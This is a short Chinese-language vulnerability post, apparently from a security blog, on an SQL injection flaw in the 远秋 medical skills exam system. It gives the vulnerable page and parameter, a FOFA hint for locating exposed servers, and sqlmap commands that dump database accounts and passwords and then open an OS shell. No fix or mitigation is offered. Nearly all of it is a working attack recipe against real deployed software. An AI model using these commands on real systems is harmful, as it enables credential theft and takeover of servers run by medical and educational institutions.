远秋医学技能考试系统SQL注入漏洞

# 远秋医学技能考试系统SQL注入漏洞

## 漏洞描述

**远秋医学技能考试系统存在SQL注入漏洞,可获取后台密码可os-shell获得shell**

## 漏洞影响

> 远秋医学技能考试系统

## FOFA

> 远秋医学技能考试系统

## 漏洞复现

存在漏洞的路径为:

“`
http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1
“`

直接SQLmap梭哈

检测是否存在注入和跑账号密码:

“`
sqlmap -u “http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1” -p id -batch
“`

“`
sqlmap -u “http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1” -users
sqlmap -u “http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1” –password
“`

一般为DBA权限,直接上os-shell

“`
sqlmap -u “http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1” –random-agent –os-shell
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容